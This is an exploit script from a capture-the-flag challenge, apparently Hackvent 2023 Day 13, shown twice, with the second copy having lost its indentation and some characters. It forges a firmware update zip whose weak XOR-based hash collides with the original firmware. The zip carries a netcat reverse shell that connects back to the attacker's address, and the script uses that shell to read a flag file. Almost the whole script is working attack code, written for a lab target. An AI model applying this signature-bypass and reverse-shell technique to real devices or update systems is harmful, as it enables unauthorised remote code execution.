Hackvent_2023/Day 13/exploit.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host 5e6a25e4-70e9-4467-ab1a-caba58cdf8e8.rdocker.vuln.land --port 1337
from pwn import *
from io import BytesIO
from Crypto.Hash import SHA1
from Crypto.Util.number import long_to_bytes, bytes_to_long
from hackingscripts import util, rev_shell
import zipfile

host = args.HOST or '98db68c6-42be-4b6c-94f3-87a044a60d13.rdocker.vuln.land'
port = int(args.PORT or 1337)

def start_remote(argv=[], *a, **kw):
    return connect(host, port)

def start(argv=[], *a, **kw):
    return start_remote(argv, *a, **kw)

def hash_data(content):
    h = 0
    for i in range(0, len(content), 8):
        h ^= sum([content[i+j] << 8*j for j in range(8) if i+j < len(content)])
    return SHA1.new(hex(h).encode()).hexdigest()

def get_version():
    io.recvuntil(b"$ ")
    io.sendline(b"version")
    data = io.recvuntil(b"\n\n")
    return re.search(r"Version 1.3.3.7, Signature: (.*)", data.decode())[1]

def update(zip_file, signature):
    io.recvuntil(b"$ ")
    io.sendline(b"update")
    io.recvuntil(b"> ")
    io.sendline(base64.b64encode(zip_file))
    io.recvuntil(b"> ")
    io.sendline(signature.encode())

def send_exit():
    io.recvuntil(b"$ ")
    io.sendline(b"exit")

io = start()

with open("firmware.zip", "rb") as f:
    orig_firmware = f.read()
    orig_hash = hash_data(orig_firmware)
    print("[+] Orig hash:", orig_hash)

ip_address = util.get_address()
shell_port = 1234
shell_cmd = rev_shell.generate_payload("nc", ip_address, shell_port, method="fifo", shell="/bin/sh")
zip_data = BytesIO()
with zipfile.ZipFile(zip_data, "w") as zip_file:
    zip_file.writestr("start.sh", shell_cmd)

# new_zip ^ orig_firmware ^ new_zip == orig_firmware
initial_zip_data = zip_data.getvalue()
zip_data = initial_zip_data
zip_data = util.pad(zip_data, 8)
zip_data += orig_firmware
zip_data = util.pad(zip_data, 8)
zip_data += initial_zip_data
zip_hash = hash_data(zip_data)

print("[+] Update hash:", zip_hash)
assert zip_hash == orig_hash

signature = get_version()
print("[+] Signature:", signature)
shell = rev_shell.trigger_background_shell(lambda: update(zip_data, signature), shell_port)
flag = shell.exec_sync("cat /app/flag && echo")
shell.close()
send_exit()
io.close()

print("[+] Flag:", flag.decode())
Day10-14 2023-12-19 16:28:13 +01:00			`#!/usr/bin/env python3`
			`# -- coding: utf-8 --`
			`# This exploit template was generated via:`
			`# $ pwn template --host 5e6a25e4-70e9-4467-ab1a-caba58cdf8e8.rdocker.vuln.land --port 1337`
			`from pwn import *`
			`from io import BytesIO`
			`from Crypto.Hash import SHA1`
			`from Crypto.Util.number import long_to_bytes, bytes_to_long`
			`from hackingscripts import util, rev_shell`
			`import zipfile`

			`host = args.HOST or '98db68c6-42be-4b6c-94f3-87a044a60d13.rdocker.vuln.land'`
			`port = int(args.PORT or 1337)`

			`def start_remote(argv=[], a, *kw):`
			`return connect(host, port)`

			`def start(argv=[], a, *kw):`
			`return start_remote(argv, a, *kw)`

			`def hash_data(content):`
			`h = 0`
			`for i in range(0, len(content), 8):`
			`h ^= sum([content[i+j] << 8*j for j in range(8) if i+j < len(content)])`
			`return SHA1.new(hex(h).encode()).hexdigest()`

			`def get_version():`
			`io.recvuntil(b"$ ")`
			`io.sendline(b"version")`
			`data = io.recvuntil(b"\n\n")`
			`return re.search(r"Version 1.3.3.7, Signature: (.*)", data.decode())[1]`

			`def update(zip_file, signature):`
			`io.recvuntil(b"$ ")`
			`io.sendline(b"update")`
			`io.recvuntil(b"> ")`
			`io.sendline(base64.b64encode(zip_file))`
			`io.recvuntil(b"> ")`
			`io.sendline(signature.encode())`

			`def send_exit():`
			`io.recvuntil(b"$ ")`
			`io.sendline(b"exit")`

			`io = start()`

			`with open("firmware.zip", "rb") as f:`
			`orig_firmware = f.read()`
			`orig_hash = hash_data(orig_firmware)`
			`print("[+] Orig hash:", orig_hash)`

			`ip_address = util.get_address()`
			`shell_port = 1234`
			`shell_cmd = rev_shell.generate_payload("nc", ip_address, shell_port, method="fifo", shell="/bin/sh")`
			`zip_data = BytesIO()`
			`with zipfile.ZipFile(zip_data, "w") as zip_file:`
			`zip_file.writestr("start.sh", shell_cmd)`

			`# new_zip ^ orig_firmware ^ new_zip == orig_firmware`
			`initial_zip_data = zip_data.getvalue()`
			`zip_data = initial_zip_data`
			`zip_data = util.pad(zip_data, 8)`
			`zip_data += orig_firmware`
			`zip_data = util.pad(zip_data, 8)`
			`zip_data += initial_zip_data`
			`zip_hash = hash_data(zip_data)`

			`print("[+] Update hash:", zip_hash)`
			`assert zip_hash == orig_hash`

			`signature = get_version()`
			`print("[+] Signature:", signature)`
			`shell = rev_shell.trigger_background_shell(lambda: update(zip_data, signature), shell_port)`
			`flag = shell.exec_sync("cat /app/flag && echo")`
			`shell.close()`
			`send_exit()`
			`io.close()`

			`print("[+] Flag:", flag.decode())`